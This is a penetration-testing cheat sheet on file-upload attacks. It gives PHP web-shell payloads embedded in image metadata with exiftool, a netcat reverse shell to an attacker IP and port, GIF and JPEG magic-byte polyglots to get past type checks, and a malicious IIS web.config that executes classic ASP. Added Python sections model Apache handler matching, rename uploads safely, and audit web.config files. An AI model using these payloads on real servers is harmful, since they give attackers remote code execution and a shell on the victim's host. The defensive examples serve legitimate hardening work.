# File Upload

# RCE through image metadata

# SIMPLE RCE
exiftool -Comment='<?php system($_GET["cmd"]); ?>' cat.jpg

# REVERSE SHELL
exiftool -Comment='<?php system("nc <YourIP> <YourPort> -e /bin/bash"); ?>' filename.png

When uploading, keep the Content-Type header in mind (application/x-php for a PHP file): the server may check it, so it may need to match what the filter expects, and the file still has to be handled as PHP by the web server for the code in the comment to execute.

# GIF

Create a file that starts with the GIF magic bytes (GIF89a;) and put the PHP payload right after them; a check that only sniffs the header sees a GIF.

GIF89a;
<?php system($_GET['cmd']); ?>

# Magic Shell

Prepend the header (magic bytes) of a valid upload type to the PHP code.

File shell.php:

<?php echo "We have RCE\n"; system($_REQUEST['cmd']); ?>

Prepend the magic bytes of an image to shell.php to bypass magic-byte/MIME validation:

$ head -c 20 image.jpg > magic-bytes
$ cat magic-bytes shell.php > magical-shell.php.jpg

Usually the file needs to end in .php for the code to execute. Sometimes, however, the Apache configuration (an AddHandler or AddType line for .php in httpd.conf or in an .htaccess) is loose enough that .php.jpg executes as PHP as well.

Why can magical-shell.php.jpg execute code? Apache's mod_mime treats every dot-separated part of a filename as an extension, so with AddHandler application/x-httpd-php .php the .php part selects the PHP handler even though .jpg comes last; the .jpg part only sets a MIME type and does not cancel the handler. The safe configuration binds the handler only to names whose final extension is .php (a FilesMatch directive anchored to the end of the filename) instead of AddHandler.
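Added example (mine, not from the page): a small Python model of the two Apache matching behaviours described above, plus the server-side naming rule that makes the double extension irrelevant. PHP_HANDLER_EXTS, ALLOWED_IMAGE_EXTS and the function names are assumed for illustration; the mod_mime multi-extension rule it models is the documented Apache behaviour.

```python
import re
import secrets

# Extensions bound to the PHP handler, as with `AddHandler application/x-httpd-php .php`.
# Assumed set for the example; a real server may map more (.phtml, .phar ...).
PHP_HANDLER_EXTS = {".php"}


def addhandler_match(filename: str, handler_exts=PHP_HANDLER_EXTS) -> bool:
    """Models mod_mime with AddHandler: every dot-separated part after the first
    is an extension, order does not matter, so magical-shell.php.jpg still
    selects the PHP handler although .jpg is the last part."""
    base = filename.rsplit("/", 1)[-1]
    return any("." + part.lower() in handler_exts for part in base.split(".")[1:])


def filesmatch_match(filename: str, pattern: str = r"\.php$") -> bool:
    """Models <FilesMatch "\\.php$"> SetHandler ...: only a trailing .php counts."""
    return re.search(pattern, filename, re.IGNORECASE) is not None


# Assumed allowlist for an image upload endpoint.
ALLOWED_IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}


def safe_store_name(user_filename: str) -> str:
    """Name the stored file ourselves: take only the client's last extension,
    require it to be allow-listed, and generate a random basename, so neither a
    .php.jpg trick nor a path component in the name survives. Raises ValueError
    when the upload must be rejected."""
    base = user_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if "." not in base:
        raise ValueError("no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_IMAGE_EXTS:
        raise ValueError(f"extension .{ext} not allowed")
    return f"{secrets.token_hex(16)}.{ext}"


def is_accepted(user_filename: str) -> bool:
    """Convenience wrapper: True if safe_store_name() would accept the name."""
    try:
        safe_store_name(user_filename)
        return True
    except ValueError:
        return False
```

Renaming on the server removes the .php part from magical-shell.php.jpg, so the handler question never arises; the content is still a PHP polyglot, which is why this belongs together with stripping or re-encoding the image and with a FilesMatch-style handler binding.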

# Web.config

For old IIS servers (7.5). If web.config itself is accepted as an upload, you can put classic ASP code at the bottom of the file: the handler mapping it declares makes IIS run *.config files through asp.dll, and the request-filtering overrides make web.config requestable, so requesting the uploaded web.config executes the ASP:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code goes here. It must not contain the XML comment terminator or a double dash, or the comment would end early and break the XML.
<%
Response.write("-"&"->")
' if requesting web.config in the browser shows 3, the ASP code is executing
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

See IppSec's HackTheBox Bounty video.
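From the defender's side, an added example (mine, not from the page or the video): a standard-library audit that parses a web.config and flags the three overrides the sample above depends on (a script engine mapped to *.config, .config removed from the blocked extensions, web.config removed from hidden segments) plus any server-side script block embedded in the file. Both sample configs are constructed; the malicious one mirrors the page's.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample mirroring the web.config on this page.
MALICIOUS_WEB_CONFIG = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code goes here
<%
Response.write("-"&"->")
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
"""

# Constructed benign sample: a default document and an ordinary handler only.
BENIGN_WEB_CONFIG = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <defaultDocument>
      <files>
        <add value="index.html" />
      </files>
    </defaultDocument>
    <handlers>
      <add name="aspx" path="*.aspx" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" />
    </handlers>
  </system.webServer>
</configuration>
"""


def audit_web_config(text: str) -> list:
    """Return a list of human-readable findings; empty means nothing suspicious."""
    findings = []
    root = ET.fromstring(text.encode("utf-8"))  # comments are dropped by the parser
    for add in root.iter("add"):
        path = add.get("path", "")
        if path.lower().endswith(".config") and add.get("scriptProcessor"):
            findings.append(f"handler '{add.get('name')}' runs {path} through {add.get('scriptProcessor')}")
    for rm in root.iter("remove"):
        if rm.get("fileExtension", "").lower() == ".config":
            findings.append("request filtering: .config removed from blocked file extensions")
        if rm.get("segment", "").lower() == "web.config":
            findings.append("request filtering: web.config removed from hidden segments")
    # The ASP lives inside an XML comment, so look at the raw text, not the tree.
    if re.search(r"<%.*?%>", text, re.S):
        findings.append("server-side script block (<% ... %>) embedded in the file")
    return findings
```

The real fix is never to let an upload land under the name web.config (or any name IIS treats as configuration); this audit is for catching the pattern in a webroot or in upload content before it is written.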